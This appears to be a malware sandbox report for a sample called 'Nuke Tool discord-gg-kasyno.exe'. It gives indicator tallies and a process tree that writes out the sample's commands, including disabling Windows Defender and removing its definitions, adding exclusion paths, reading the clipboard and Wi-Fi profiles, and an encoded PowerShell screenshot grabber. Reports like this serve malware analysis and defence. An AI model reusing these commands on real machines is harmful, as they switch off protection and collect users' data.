File opened for modification	C:\Users\Admin\Downloads\HxDSetup.zip:Zone.Identifier	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\dnSpy-net-win64.zip:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4492	powershell.exe
3900	powershell.exe
3900	powershell.exe
4492	powershell.exe
5100	powershell.exe
5100	powershell.exe
5100	powershell.exe
4240	powershell.exe
4240	powershell.exe
4240	powershell.exe
4364	powershell.exe
4364	powershell.exe
4364	powershell.exe
4196	powershell.exe
4196	powershell.exe
3732	powershell.exe
3732	powershell.exe
2832	powershell.exe
2832	powershell.exe
1008	powershell.exe
1008	powershell.exe
8	msedge.exe
8	msedge.exe
2268	msedge.exe
2268	msedge.exe
4624	msedge.exe
4624	msedge.exe
3260	identity_helper.exe
3260	identity_helper.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

pid	Process
4888	taskmgr.exe
7084	msedge.exe
5472	msedge.exe
6344	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 64 IoCs

pid	Process
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3900	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	5100	powershell.exe
Token: SeDebugPrivilege	2760	tasklist.exe
Token: SeDebugPrivilege	3564	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1684	WMIC.exe
Token: SeSecurityPrivilege	1684	WMIC.exe
Token: SeTakeOwnershipPrivilege	1684	WMIC.exe
Token: SeLoadDriverPrivilege	1684	WMIC.exe
Token: SeSystemProfilePrivilege	1684	WMIC.exe
Token: SeSystemtimePrivilege	1684	WMIC.exe
Token: SeProfSingleProcessPrivilege	1684	WMIC.exe
Token: SeIncBasePriorityPrivilege	1684	WMIC.exe
Token: SeCreatePagefilePrivilege	1684	WMIC.exe
Token: SeBackupPrivilege	1684	WMIC.exe
Token: SeRestorePrivilege	1684	WMIC.exe
Token: SeShutdownPrivilege	1684	WMIC.exe
Token: SeDebugPrivilege	1684	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1684	WMIC.exe
Token: SeRemoteShutdownPrivilege	1684	WMIC.exe
Token: SeUndockPrivilege	1684	WMIC.exe
Token: SeManageVolumePrivilege	1684	WMIC.exe
Token: 33	1684	WMIC.exe
Token: 34	1684	WMIC.exe
Token: 35	1684	WMIC.exe
Token: 36	1684	WMIC.exe
Token: SeDebugPrivilege	4240	powershell.exe
Token: SeDebugPrivilege	3720	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1684	WMIC.exe
Token: SeSecurityPrivilege	1684	WMIC.exe
Token: SeTakeOwnershipPrivilege	1684	WMIC.exe
Token: SeLoadDriverPrivilege	1684	WMIC.exe
Token: SeSystemProfilePrivilege	1684	WMIC.exe
Token: SeSystemtimePrivilege	1684	WMIC.exe
Token: SeProfSingleProcessPrivilege	1684	WMIC.exe
Token: SeIncBasePriorityPrivilege	1684	WMIC.exe
Token: SeCreatePagefilePrivilege	1684	WMIC.exe
Token: SeBackupPrivilege	1684	WMIC.exe
Token: SeRestorePrivilege	1684	WMIC.exe
Token: SeShutdownPrivilege	1684	WMIC.exe
Token: SeDebugPrivilege	1684	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1684	WMIC.exe
Token: SeRemoteShutdownPrivilege	1684	WMIC.exe
Token: SeUndockPrivilege	1684	WMIC.exe
Token: SeManageVolumePrivilege	1684	WMIC.exe
Token: 33	1684	WMIC.exe
Token: 34	1684	WMIC.exe
Token: 35	1684	WMIC.exe
Token: 36	1684	WMIC.exe
Token: SeDebugPrivilege	4364	powershell.exe
Token: SeDebugPrivilege	4052	tasklist.exe
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeDebugPrivilege	3732	powershell.exe
Token: SeIncreaseQuotaPrivilege	4816	WMIC.exe
Token: SeSecurityPrivilege	4816	WMIC.exe
Token: SeTakeOwnershipPrivilege	4816	WMIC.exe
Token: SeLoadDriverPrivilege	4816	WMIC.exe
Token: SeSystemProfilePrivilege	4816	WMIC.exe
Token: SeSystemtimePrivilege	4816	WMIC.exe
Token: SeProfSingleProcessPrivilege	4816	WMIC.exe
Token: SeIncBasePriorityPrivilege	4816	WMIC.exe
Token: SeCreatePagefilePrivilege	4816	WMIC.exe
Token: SeBackupPrivilege	4816	WMIC.exe
Token: SeRestorePrivilege	4816	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
2268	msedge.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe
4888	taskmgr.exe

Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
7084	msedge.exe
4848	HxD.exe
4848	HxD.exe
4848	HxD.exe
4848	HxD.exe
4848	HxD.exe
4848	HxD.exe
5404	HxD.exe
4848	HxD.exe
5472	msedge.exe
5472	msedge.exe
5472	msedge.exe
6344	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3440 wrote to memory of 3032	3440	cmd.exe	78
PID 3440 wrote to memory of 3032	3440	cmd.exe	78
PID 3032 wrote to memory of 3380	3032	Nuke Tool discord-gg-kasyno.exe	79
PID 3032 wrote to memory of 3380	3032	Nuke Tool discord-gg-kasyno.exe	79
PID 3380 wrote to memory of 1152	3380	Nuke Tool discord-gg-kasyno.exe	80
PID 3380 wrote to memory of 1152	3380	Nuke Tool discord-gg-kasyno.exe	80
PID 3380 wrote to memory of 3108	3380	Nuke Tool discord-gg-kasyno.exe	81
PID 3380 wrote to memory of 3108	3380	Nuke Tool discord-gg-kasyno.exe	81
PID 1152 wrote to memory of 4492	1152	cmd.exe	84
PID 1152 wrote to memory of 4492	1152	cmd.exe	84
PID 3108 wrote to memory of 3900	3108	cmd.exe	85
PID 3108 wrote to memory of 3900	3108	cmd.exe	85
PID 3380 wrote to memory of 3056	3380	Nuke Tool discord-gg-kasyno.exe	86
PID 3380 wrote to memory of 3056	3380	Nuke Tool discord-gg-kasyno.exe	86
PID 3380 wrote to memory of 2164	3380	Nuke Tool discord-gg-kasyno.exe	87
PID 3380 wrote to memory of 2164	3380	Nuke Tool discord-gg-kasyno.exe	87
PID 3380 wrote to memory of 2596	3380	Nuke Tool discord-gg-kasyno.exe	88
PID 3380 wrote to memory of 2596	3380	Nuke Tool discord-gg-kasyno.exe	88
PID 2596 wrote to memory of 4840	2596	cmd.exe	92
PID 2596 wrote to memory of 4840	2596	cmd.exe	92
PID 3056 wrote to memory of 5100	3056	cmd.exe	93
PID 3056 wrote to memory of 5100	3056	cmd.exe	93
PID 3380 wrote to memory of 4244	3380	Nuke Tool discord-gg-kasyno.exe	95
PID 3380 wrote to memory of 4244	3380	Nuke Tool discord-gg-kasyno.exe	95
PID 3380 wrote to memory of 4748	3380	Nuke Tool discord-gg-kasyno.exe	96
PID 3380 wrote to memory of 4748	3380	Nuke Tool discord-gg-kasyno.exe	96
PID 2164 wrote to memory of 1116	2164	cmd.exe	94
PID 2164 wrote to memory of 1116	2164	cmd.exe	94
PID 3380 wrote to memory of 1164	3380	Nuke Tool discord-gg-kasyno.exe	100
PID 3380 wrote to memory of 1164	3380	Nuke Tool discord-gg-kasyno.exe	100
PID 3380 wrote to memory of 5040	3380	Nuke Tool discord-gg-kasyno.exe	101
PID 3380 wrote to memory of 5040	3380	Nuke Tool discord-gg-kasyno.exe	101
PID 3380 wrote to memory of 2240	3380	Nuke Tool discord-gg-kasyno.exe	104
PID 3380 wrote to memory of 2240	3380	Nuke Tool discord-gg-kasyno.exe	104
PID 4748 wrote to memory of 2760	4748	cmd.exe	105
PID 4748 wrote to memory of 2760	4748	cmd.exe	105
PID 3380 wrote to memory of 1640	3380	Nuke Tool discord-gg-kasyno.exe	107
PID 3380 wrote to memory of 1640	3380	Nuke Tool discord-gg-kasyno.exe	107
PID 3380 wrote to memory of 3244	3380	Nuke Tool discord-gg-kasyno.exe	163
PID 3380 wrote to memory of 3244	3380	Nuke Tool discord-gg-kasyno.exe	163
PID 3380 wrote to memory of 2544	3380	Nuke Tool discord-gg-kasyno.exe	110
PID 3380 wrote to memory of 2544	3380	Nuke Tool discord-gg-kasyno.exe	110
PID 4244 wrote to memory of 3564	4244	cmd.exe	112
PID 4244 wrote to memory of 3564	4244	cmd.exe	112
PID 3380 wrote to memory of 4336	3380	Nuke Tool discord-gg-kasyno.exe	113
PID 3380 wrote to memory of 4336	3380	Nuke Tool discord-gg-kasyno.exe	113
PID 3380 wrote to memory of 2696	3380	Nuke Tool discord-gg-kasyno.exe	115
PID 3380 wrote to memory of 2696	3380	Nuke Tool discord-gg-kasyno.exe	115
PID 1164 wrote to memory of 1684	1164	cmd.exe	118
PID 1164 wrote to memory of 1684	1164	cmd.exe	118
PID 5040 wrote to memory of 4240	5040	cmd.exe	119
PID 5040 wrote to memory of 4240	5040	cmd.exe	119
PID 2240 wrote to memory of 3720	2240	cmd.exe	120
PID 2240 wrote to memory of 3720	2240	cmd.exe	120
PID 1640 wrote to memory of 2748	1640	cmd.exe	122
PID 1640 wrote to memory of 2748	1640	cmd.exe	122
PID 4336 wrote to memory of 2216	4336	cmd.exe	123
PID 4336 wrote to memory of 2216	4336	cmd.exe	123
PID 2696 wrote to memory of 4364	2696	cmd.exe	124
PID 2696 wrote to memory of 4364	2696	cmd.exe	124
PID 3244 wrote to memory of 1940	3244	cmd.exe	125
PID 3244 wrote to memory of 1940	3244	cmd.exe	125
PID 1116 wrote to memory of 3848	1116	bound.exe	126
PID 1116 wrote to memory of 3848	1116	bound.exe	126

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4360	attrib.exe
3956	attrib.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3440
- C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe
  "C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3032
- - C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe
    "C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe"
    3⤵
    - Drops file in Drivers directory
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1152
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nuke Tool discord-gg-kasyno.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3108
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3056
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "start bound.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2164
    - - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1116
      - C:\Users\Admin\AppData\Local\Temp\bound.exe
        
        bound.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3848
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        7⤵
        
        PID:2732
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ANY ISSUES? T.ME/SWIEZAK', 0, 'THX FOR USING', 0+16);close()""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2596
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('ANY ISSUES? T.ME/SWIEZAK', 0, 'THX FOR USING', 0+16);close()"
        5⤵
        
        PID:4840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4244
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4748
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1164
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      Suspicious use of WriteProcessMemory
      PID:5040
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4240
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2240
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:3720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1640
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      Suspicious use of WriteProcessMemory
      PID:3244
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:2544
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:2292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4336
    - - C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        5⤵
        
        PID:2216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2696
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
